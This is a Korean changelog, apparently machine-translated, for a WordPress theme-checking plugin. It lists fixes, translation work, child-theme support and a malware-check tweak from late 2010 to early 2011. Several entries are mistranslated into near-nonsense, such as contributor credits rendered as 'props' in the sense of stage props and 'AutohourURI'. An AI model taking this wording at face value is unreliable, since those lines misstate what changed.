  • 마지막으로 테스트한 테마는 항상 테마 목록에서 미리 선택되어 있습니다.
  • admin_menu.php의 PHP 오류 수정

20110219.1

  • 변경 사항은 커밋 로그를 참조하세요.

20110201.2

  • UI 버그 수정 포럼 게시물 소품 Mamaduka.
  • Textdomain은 도메인이 없는 20개를 확인합니다.
  • div가 소품 Mamaduka를 닫지 않는 문제를 수정했습니다.

20110201.1

  • i18n 작업
  • sr_RS de_DE ro_RO는 Daniel Tara와 Emil Uzelac을 소품으로 사용합니다.
  • 하위 테마 지원 추가, 런타임 시 상위 및 하위에 대한 검사.
  • 검토자를 위해 추적 형식 지정 버튼이 추가되었습니다.

20101228.3

  • 3.1의 ​​마지막 개정판(바라건대)
  • searchform.php 포함 여부를 확인하는 칩 제안(
    아직 완벽하지만 찾으려면 더 많은 예제가 필요합니다).
  • add_theme_page는 필수이며 다른 모든 항목에는 플래그가 지정되고 다음과 같이 표시됩니다.
    번호.
  • 대부분 국제화되어 있으며 지금 번역이 필요합니다.
  • 버그 수정.

20101228.2

  • 메뉴 확인 기능이 추가되었습니다.
  • ThemeURI AutohourURI가 결과에 추가되었습니다.
  • 많은 작은 수정.
  • 번역을 시작했습니다.

20101228.1

  • embed_defaults 필터 확인 및 스타일시트 파일 데이터 확인을 수정합니다.

20101226.1

  • WordPress.org 업로더와 더 쉽게 동기화할 수 있도록 전체 시스템이 재설계되었습니다. 다른 많은 추가/빼기/변경 사항도 있습니다.
  • 테마 작성자가 향후 릴리스에 대한 호환성을 보장할 수 있도록 WordPress 3.1 지침이 추가되었습니다.

20101110.7

  • Malware.php가 fopen 및 file_get_contents(INFO)를 다시 확인합니다.
  • 정의되지 않은 몇 가지 인덱스 오류를 수정했습니다.

20101110.4_r2

  • 수정된 경고: stristr()에 대한 잘못된 매개변수 개수

20101110.4_r1

  • 제안된.php에 에코를 추가했습니다.

20101110.4

  • get_plugins()에 대한 더 이상 사용되지 않는 함수 호출을 수정했습니다.

20101110.3

  • 정의되지 않은 인덱스를 수정했습니다.

20101110.2

  • 잃어버린< in main.php
  • style.css의 license.txt 또는 라이선스 태그에 대한 조건부 검사 추가
  • UI 개선.